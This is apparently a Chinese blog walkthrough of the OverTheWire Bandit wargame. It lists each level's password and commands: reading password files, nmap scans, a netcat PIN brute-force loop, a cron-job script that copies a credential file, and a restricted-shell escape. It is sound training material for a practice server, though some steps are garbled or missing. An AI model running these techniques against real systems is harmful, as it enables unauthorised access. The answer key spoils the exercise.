OverTheWire是一个在线游戏,玩家通过SSH连接解决一系列涉及Linux命令行工具的谜题,从Level0到Level34,每个级别都需要找到新的密码才能进入下一个级别。游戏涵盖了文件操作、压缩、加密、网络通信等多个方面,旨在提升用户对Linux系统的理解和技能。
OverTheWire
一款黑客游戏:
https://overthewire.org/wargames/bandit/
参考答案:
https://www.bilibili.com/video/BV1ao4y1x7gT/?spm_id_from=333.999.0.0(版本一样,已三连)
https://blog.csdn.net/weixin_47610939/article/details/122509060(版本有点不太一样)
Level 0
用ssh 连接到bandit.labs.overthewire.org
账号密码:bandit0
ssh bandit0@bandit.labs.overthewire.org -p 2220
输入密码
成功
之后每关找到密码都ssh重新进去下一个bandit
Level 0 → Level 1
ls
cat readme
Level 1 → Level 2
NH2SXQwcBdpmTEzi3bvBHMM9H66vVXjL
ls
cat ./-
直接cat -显示不出来,当-做文件时要加路径。
Level 2 → Level 3
rRGizSaX8Mk1RTb1CNQoXTcYZWU6lgzi
ls
cat spaces\ in\ this\ filename
或
cat "aces in this filename"
linux 下有空格都要转义
Level 3 → Level 4
aBZ0W5EmUfAf7kHTQeOwd8bauFJ2lAiG
ls
cd inhere
ls -a
cat .hidden
Level 4 → Level 5
2EW7BBsr6aMMoJ2HjW067dm8EgX26xNe
ls
cd inhere
ls
tail ./-*
Level 5 → Level 6
lrIWWI6bB37kxfiCQZqUdOIYfr6eEeqR
ls
cd inhere
ls
find . -size 1033c
cat ./maybehere07/.file2
Level 6 → Level 7
P4L4vucdmLnm8I7Vl7jG1ApGSfjYKqJU
cd /
find . -size 33c -user bandit7 -group bandit6 2>/dev/null
cat ./var/lib/dpkg/info/bandit7.password
Level 7 → Level 8
z7WtoNQU2XfjmMtWA8u5rN4vzqu4v99S
ls
grep -srn "millionth"
或
cat data.txt | grep millionth
Level 8 → Level 9
TESKZC0XvTetK0S9xNwm25STk5iWrBvP
sort data.txt | uniq -u
Level 9 → Level 10
EN632PlfYiZbn3PhVK3XOGSlNInNE00t
strings data.txt | grep ==
strings命令在对象文件或二进制文件中查找可打印的字符串。
Level 10 → Level 11
G7w8LIi6J3kTb8A7j9LgrywtEUlyyp6s
base64 -d data.txt
data.txt 是通过base64 的加密文件,解密就行
Level 11 → Level 12
6zPeziLdR2RKNdNYFNb6nVCKzphlXHBM
cat data.txt | tr 'a-zA-Z' 'n-za-mN-ZA-M'
字母移位13位。
Level 12 → Level 13
JVNBBFSmZwKKOP0XbFXOoW8chDz5yVRv
bandit12@bandit:~$ mkdir /tmp/bandit12
bandit12@bandit:~$ cp -r data.txt /tmp/bandit12/
bandit12@bandit:~$ cd /tmp/bandit12
bandit12@bandit:/tmp/bandit12$ ls
data.txt
bandit12@bandit:/tmp/bandit12$ file data.txt
data.txt: ASCII text
bandit12@bandit:/tmp/bandit12$ cat data.txt | xxd -r
4h�4M��i�"E��BZh91AY&SY{O�_���o���������������������������;Vhd4�A���i�
�@�4A������ڀh4�h4�mF@��
C@hd2@
�hF���4��X����dB�GaB�~6�V;4A�Gf���͌�>��G�
�`w�B��x)�B���
xk�|�I�F��Ds������>R�4�^d��!P^�g�!�)������O^�����1���IF� 7�k�Fx��i�,�2�=�l� [��ĵF�7�YxX�HF��;������ň�`n%,td;PFATu3���SةY_�l��-��<��AV�P�Id��J-���Se'�y� _1��F�t��#^�ha�X"l=�]��fw��D�Zo,A
B�
��
����4@weR�I7�}���8v9���H;uH%�}�$�i
�KL��1�������2���v���)�|�R�i�b�� ��A�N��]��BA�>Y|�.��Ebandit12@bandit:/tmp/bandit12$ cat data.txt | xxd -r > hexdump
bandit12@bandit:/tmp/bandit12$ file hexdump
hexdump: gzip compressed data, was "data2.bin", last modified: Sun Apr 23 18:04:23 2023, max compression, from Unix, original size modulo 2^32 581
bandit12@bandit:/tmp/bandit12$ mv hexdump hexdump.gz
bandit12@bandit:/tmp/bandit12$ gzip -d hexdump.gz
bandit12@bandit:/tmp/bandit12$ file hexdump
hexdump: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/bandit12$ mv hexdump hexdump.bz2
bandit12@bandit:/tmp/bandit12$ bzip2 -d hexdump.bz2
bandit12@bandit:/tmp/bandit12$ file hexdump
hexdump: gzip compressed data, was "data4.bin", last modified: Sun Apr 23 18:04:23 2023, max compression, from Unix, original size modulo 2^32 20480
bandit12@bandit:/tmp/bandit12$ mv hexdump hexdump.gz
bandit12@bandit:/tmp/bandit12$ gzip -d hexdump.gz
bandit12@bandit:/tmp/bandit12$ file hexdump
hexdump: POSIX tar archive (GNU)
bandit12@bandit:/tmp/bandit12$ ls
data.txt hexdump
bandit12@bandit:/tmp/bandit12$ tar xvf hexdump
data5.bin
bandit12@bandit:/tmp/bandit12$ ls
data5.bin data.txt hexdump
bandit12@bandit:/tmp/bandit12$ file data
data5.bin data.txt
bandit12@bandit:/tmp/bandit12$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@bandit:/tmp/bandit12$ tar xvf data5.bin
data6.bin
bandit12@bandit:/tmp/bandit12$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/bandit12$ mv data6.bin data6.bz2
bandit12@bandit:/tmp/bandit12$ bzip2 -d data6.bz2
bandit12@bandit:/tmp/bandit12$ ls
data5.bin data6 data.txt hexdump
bandit12@bandit:/tmp/bandit12$ file data6
data6: POSIX tar archive (GNU)
bandit12@bandit:/tmp/bandit12$ tar xvf data6
data8.bin
bandit12@bandit:/tmp/bandit12$ file data8.bin
data8.bin: gzip compressed data, was "data9.bin", last modified: Sun Apr 23 18:04:23 2023, max compression, from Unix, original size modulo 2^32 49
bandit12@bandit:/tmp/bandit12$ mv data8.bin data8.gz
bandit12@bandit:/tmp/bandit12$ gzip -d data8.gz
bandit12@bandit:/tmp/bandit12$ file data8
data8: ASCII text
bandit12@bandit:/tmp/bandit12$ cat data8
The password is wbWdlBxEir4CaE8LaPhauuOo6pwRmrDw
先在tmp下创建个文件夹,然后通过xxd分析文件,file分析文件类型,改后缀名,解压。
Level 13 → Level 14
wbWdlBxEir4CaE8LaPhauuOo6pwRmrDw
ssh bandit14@bandit.labs.overthewire.org -p 2220 -i sshkey.private
yes
cat /etc/bandit_pass/bandit14
通过秘钥登陆到bandit14,再拿14的密码
Level 14 → Level 15
fGrHPx402xGC7U7rXKDaxiWFTOiF0ENq
nc localhost 30000
fGrHPx402xGC7U7rXKDaxiWFTOiF0ENq
这一关用nc把14的密码发送到30000这个端口,用nc命令就可以搞定
Level 15 → Level 16
jN2kgmIXJ6fShzhT2avhotn4Zcka6tnt
openssl s_client localhost:30001
jN2kgmIXJ6fShzhT2avhotn4Zcka6tnt
通过openssl连接30001端口,发送当前关卡的密码就可以获得16的密码
Level 16 → Level 17
JQttfApK4SeyHwDlI9SXGR50qclOAil1
nmap localhost -p 31000-32000
nmap localhost -sV -p 31046,31518,31691,31790,31960
openssl s_client localhost:31790#先试了第一个ssl没出来东西
JQttfApK4SeyHwDlI9SXGR50qclOAil1
然后将这段秘钥保存下来,我想保存到/tmp/bandit16下的,发现已经有了一个。
cd /tmp/bandit16
ssh bandit17@bandit.labs.overthewire.org -p 2220 -i bandit17.key
whoami
cat /etc/bandit_pass/bandit17
Level 17 → Level 18
VwOSWtCA7lRKkTfbr2IDh6awj9RNZM5e
diff passwords.new passwords.old
42c42
< hga5tuuCLF6fFzUpnagiMN8ssu9LFrdg
---
> glZreTEH1V3cGKL6g4conYqZqaEj0mte
Level 18 → Level 19
hga5tuuCLF6fFzUpnagiMN8ssu9LFrdg
这一关直接登录的话,会显示一个“Byebye”,然后会话被关闭,原因是.bashrc被改动了,我们可以用带命令的ssh来查看文件。
ssh bandit18@bandit.labs.overthewire.org -p 2220 "cat ./readme"
Level 19 → Level 20
awhqfNnAbc1naukrpqDYcF95h7HoMTrC
./bandit20-do whoami
#bandit20
./bandit20-do cat /etc/bandit_pass/bandit20
hard
Level 20 → Level 21
VxCazJaVykI6W36BkBU0mJTCM8rR95XT
There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).
nc -lvp 8989 &
./suconnect 8989 &
jobs
fg 1
VxCazJaVykI6W36BkBU0mJTCM8rR95XT
也可以再开个窗口连接来实现。
Level 21 → Level 22
NvEJF7oVjkddltPSrdKEFOllh9V1IBcq
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
cd etc/cron.d
ls
cat cronjob_bandit22
cat /usr/bin/cronjob_bandit22.sh
cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Level 22 → Level 23
WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
Level 23 → Level 24
QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
脚本意思:执行/var/spool/bandit24/foo下的 *.* 脚本,执行完后删除。
vim /tmp/b24.sh
cat /etc/bandit_pass/bandit24 > /tmp/b24pw
chmod 777 /tmp/b24.sh
cp -r /tmp/b24.sh /var/spool/bandit24/foo/
cat /tmp/b24pw#多执行几次,可能一开始没有
Level 24 → Level 25
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
You do not need to create new connections each time
需要暴力破解
for i in {0000..9999};do echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar $i;done | nc localhost 30002
Level 25 → Level 26
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.
目录下有26的秘钥,但是因为26用的shell不是/bin/bash,所以进不去。
需要将cmd终端缩小,不让它一次性全显示出来,通过v进入编辑模式,修改shell。
这个时候按 v 进入编辑模式。
Level 26 → Level 27
c7GvcKlw9mC7aUQaPx7nwFstuAIBw1o1(需要通过上一关的方式进入)
Level 27 → Level 28
YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS
There is a git repository at
ssh://bandit27-git@localhost/home/bandit27-git/repovia the port2220. The password for the userbandit27-gitis the same as for the userbandit27.Clone the repository and find the password for the next level.
git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo
cd repo
cat README
Level 28 → Level 29
AVanL161y9rsbcJIsFHuw35rjaOM19nR
There is a git repository at
ssh://bandit28-git@localhost/home/bandit28-git/repovia the port2220. The password for the userbandit28-gitis the same as for the userbandit28.Clone the repository and find the password for the next level.
密码被修改了,查看git log记录
Level 29 → Level 30
tQKvmcwNYcFS6vmPHIUSI3ShmsrQZK8S
There is a git repository at
ssh://bandit29-git@localhost/home/bandit29-git/repovia the port2220. The password for the userbandit29-gitis the same as for the userbandit29.Clone the repository and find the password for the next level.
切换分支dev 下有
Level 30 → Level 31
xbhV3HpNGlTIdnjUrdAlPzc2L6y9EOnS
密码藏在 引用 里
Level 31 → Level 32
OoffzGDlzhAlerFJ2cAiz1D41JW1Mhmt
创建文件,并提交
Level 32 → Level 33
rmCBvG56y58BXzv98yZGdO7ATVL5dW8y
Level 33 → Level 34
odHo63fHiFqcWWJG9rLiLDtPm45KzUKy
At this moment, level 34 does not exist yet.
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
